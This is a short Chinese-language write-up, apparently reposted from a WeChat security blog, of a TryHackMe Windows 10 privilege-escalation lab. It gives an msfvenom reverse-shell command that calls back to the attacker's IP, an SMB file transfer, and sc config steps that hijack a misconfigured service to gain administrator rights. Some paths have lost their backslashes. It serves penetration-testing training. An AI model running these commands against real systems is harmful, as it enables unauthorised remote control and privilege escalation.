点击蓝字关注我们

0x00:在线漏洞平台利用

本次的在线漏洞平台是Try hack me具体链接为https://tryhackme.com/room/windows10privesc。可以使用平台所提供的网页kali版，或者是用自己kali连到他们内网里面都可。

攻击机: kali ip 10.4.37.12

目标机器:windows10 ip 10.10.143.152

首先使用xfreerdp进行远程连接

命令: xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.143.152

0x01:制作反弹shell+传送到目标机器

为了控制一波我们的windows10,我们得先在kali本地制作一个反弹shell先。

命令:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.4.37.12 LPORT=667 -f exe -o reverseshell.exe

关于传送的到目标机器可以用kali自带的smbserver

命令: sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .

然后在我们的windows10的CMD命令行模式下输入

命令:copy \10.4.37.12kalirevershell.exe C:PrivEscreverseshell.exe

接着去到我们刚才存放的地方，记得提前在kali处打开波端口。一个点击就能获得了。

0x02:不安全的服务权限设计

由于管理员可能没有配置好相关用户权限导致普通用户可能对某些服务拥有过多的权限可以从普通用户升级为管理员。这里使用波攻击机所提供的accesschk.exe,可以看到user拥有更改daclsvc服务的service_change_config的权限。

命令: accesschk.exe -uwcqv "user" *

接下来就是查询波这个服务的路径,可以看到路径是在C:Program FilesDACL Servicedaclservice.exe，我们可以把路径指到我们的反弹shell里面

命令:sc qc daclsvc

命令: sc config daclsvc binpath=""C:PrivEscreverseshell.exe""

重定向以后我们可以重启波,记得再开一个nc，最后我们的权限已经是管理员了。

命令:net start daclsvc

原文始发于微信公众号（神隐攻防实验室）：Windows提权(1.权限配置失误)